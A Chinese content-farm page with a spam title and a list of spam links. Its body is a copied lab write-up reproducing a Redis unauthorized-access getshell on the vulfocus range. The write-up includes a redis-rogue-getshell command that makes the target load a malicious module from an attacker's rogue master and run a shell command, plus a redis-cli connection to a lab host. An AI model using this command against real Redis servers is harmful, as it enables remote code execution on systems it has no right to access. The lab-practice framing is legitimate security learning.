当前位置: 首页 > news >正文

权重6网站怎么做站长统计免费下载

权重6网站怎么做,站长统计免费下载,制作相册怎么做,做网站怎么云存储1.复现环境与工具 环境是在vulfocus上面 工具:GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module 参考攻击使用方式与原理:https://vulhub.org/#/environments/redis/4-unacc/ 2.复现 需要一个外网的服务器做&…

1.复现环境与工具

环境是在vulfocus上面

工具:GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module

参考攻击使用方式与原理:https://vulhub.org/#/environments/redis/4-unacc/

2.复现

需要一个外网的服务器做,上传这个工具到服务器上进入这个文件夹里面后输入命令:
python3 redis-master.py -r 目的ip -p 目的端口 -L 你的ip -P 你开放的端口 -f RedisModulesSDK/exp.so -c "id"

出了一个file,搜了一下是由于这个文件用python3写的,要检查一下你的服务器上是不是python版本3.0以上,用where python查python的安装位置
ls -l 目录/py* 得到代python的所有文件,看有没有python3 ,他的命令是什么
参考:Linux系统安装Python3环境(超详细)-腾讯云开发者社区-腾讯云

我这里是装了的,名称为python3

这个要先根据他github上面的内容去做make之后再运行
python3 redis-master.py -r 目的ip -p 目的端口 -L 攻击者ip -P 对应端口 -f RedisModulesSDK/exp.so -c "id"redis-cli -h 123.58.224.8 -p 45635
用redis组件去连接上这个redis,之后按照我的理解来说应该是用redis写入公钥连接才对:

参考redis未授权访问-cnvd 2015-0755漏洞复现 - FreeBuf网络安全行业门户

但是去试的时候发现

好像是环境有点问题,没权限了
所以需要用写入web的方法去做,要换工具做
要是还是想得到flag的话就参考

未授权漏洞vulfocu靶场实战_vulfocus中redis未授权漏洞如何拿到falg-CSDN博客

vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557-CSDN博客

我太懒了,实在不想重新来过了

http://www.zhongyajixie.com/news/38570.html

相关文章:

  • 计算机毕设做网站难吗网络推广是什么职业
  • 网站建设背景是什么推广软文平台
  • 陕西省建设工会网站北京网站营销与推广
  • 杭州网站建设icp备网站注册域名
  • 做网站好用的cms手机流畅优化软件
  • 二手车辆交易网站如何做seo分析seo诊断
  • 武汉手机网站建设信息优化大师下载安装免费
  • ipad可以做网站吗杭州网站设计公司
  • 巩义机械厂网站建设成功的软文营销案例
  • 做电影网站赚钱知乎兰州模板网站seo价格
  • 怎么用ps做网站幻灯片浙江网站建设营销
  • 电脑网站模板百度竞价关键词优化
  • 网络综合布线设计方案百度seo公司哪家强一点
  • 学校网站设计论文百度查询最火的关键词
  • wordpress安装包文件夹专业网站优化
  • chn域名网站b站推广网站2024下载
  • 门户网站 建设什么是营销模式
  • 衢州网站推广网络精准推广
  • 河津网站建设网络营销专业
  • 电商网站首页开发seo排名赚能赚钱吗
  • 如何做国外假发网站b站暴躁姐
  • 假快递单制作软件app上海seo优化服务公司
  • 网络搭建百度百科优化设计答案大全
  • 模板网站怎么样小红书关键词检测
  • wordpress hacker主题广州网站优化方案
  • 网站建设素材图南京seo培训
  • 网站开发系统论文网店运营培训哪里好
  • 做空间的网站广州网站设计专注乐云seo
  • 怎么做英文的网站首页合肥优化
  • 政府门户网站建设依据此网站服务器不在国内维护